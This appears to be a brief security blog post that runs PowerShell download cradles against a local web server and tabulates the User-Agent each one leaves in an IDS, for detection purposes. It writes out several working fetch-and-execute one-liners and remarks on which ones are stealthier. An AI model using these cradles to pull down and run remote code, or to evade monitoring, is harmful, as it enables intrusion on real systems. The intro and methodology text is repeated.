Intro
There was recently a Twitter discussion around PowerShell download cradles and the User Agents they use. I decided to take a look via IDS.
Methodology
I grabbed this list from @harmj0y's GitHub page and ran them through them all, hosting a benign PowerShell script on a local web server. I then used the awesome SELKS IDS distribution to take a look at the User Agents these various methods used.
Findings
There was recently a Twitter discussion around PowerShell download cradles and the User Agents they use. I decided to take a look via IDS.
Methodology
I grabbed this list from @harmj0y's GitHub page and ran them through them all, hosting a benign PowerShell script on a local web server. I then used the awesome SELKS IDS distribution to take a look at the User Agents these various methods used.
Findings
Command
|
User-Agent
|
IEX (New-Object
Net.Webclient).downloadstring("http://192.168.1.116/hey.ps1")
|
No User Agent
|
IEX (iwr 'http://192.168.1.116/hey.ps1')
|
Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US)
WindowsPowerShell/5.1.15063.483
|
$ie=New-Object -comobject
InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.1.116/hey.ps1');start-sleep
-s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
|
N/A – Couldn’t get this one to work
|
$h=New-Object -ComObject
Msxml2.XMLHTTP;$h.open('GET','http://192.168.1.116/hey.ps1',$false);$h.send();iex
$h.responseText
|
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0;
Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)
|
$h=new-object -com
WinHttp.WinHttpRequest.5.1;$h.open('GET','http://192.168.1.116/hey.ps1',$false);$h.send();iex
$h.responseText
|
Mozilla/4.0 (compatible; Win32;
WinHttp.WinHttpRequest.5)
|
Import-Module bitstransfer;Start-BitsTransfer 'http://192.168.1.116/hey2.ps1'
$env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r
|
Microsoft BITS/7.8
|
$a = New-Object System.Xml.XmlDocument
$a.Load("http://192.168.1.116/hey.txt")
$a.command.a.execute | iex
|
No User Agent
|
Notes
- Fairly interesting findings. I'm not sure if this was an exhaustive list of cradles. If anyone has more they'd like tested just message me on twitter @Antonlovesdnb
- It looks like from a stealth point of view, at least when looking at User Agents, the first and last methods on the chart seem more stealthy. Although the BITS method is interesting as well, depending on the organizations' traffic profile, BITS might be very common.
- I ran these tests on a Windows 10 host, with the latest updates & PSv5
Major Minor Build Revision
----- ----- ----- --------
5 1 15063 483
- I was kind of hoping that each method would leave a unique User Agent that I could build some kind of IDS alert around, but this doesn't seem to be the case. Your best bet in identifying malicious activity of this sort is PowerShell logging + Sysmon.
Hope this was helpful.